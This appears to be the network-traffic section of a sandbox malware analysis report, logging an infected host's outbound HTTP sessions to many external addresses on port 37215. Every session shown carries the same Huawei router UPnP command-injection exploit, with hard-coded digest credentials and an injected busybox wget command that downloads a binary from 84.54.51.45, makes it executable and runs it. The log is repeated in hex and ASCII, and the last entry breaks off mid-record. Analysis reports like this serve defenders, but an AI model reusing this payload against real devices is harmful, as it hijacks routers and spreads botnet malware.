                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1896192.168.2.155418041.193.62.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599687099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1897192.168.2.156081441.5.249.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599705935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1898192.168.2.155629441.126.186.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599739075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1899192.168.2.155915041.130.88.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599760056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1900192.168.2.154789641.16.158.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599786043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1901192.168.2.154210041.49.250.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599827051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1902192.168.2.155596441.141.240.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599845886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1903192.168.2.155855641.80.251.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599869967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1904192.168.2.154790441.7.183.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599869967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1905192.168.2.155783241.181.173.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599884987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 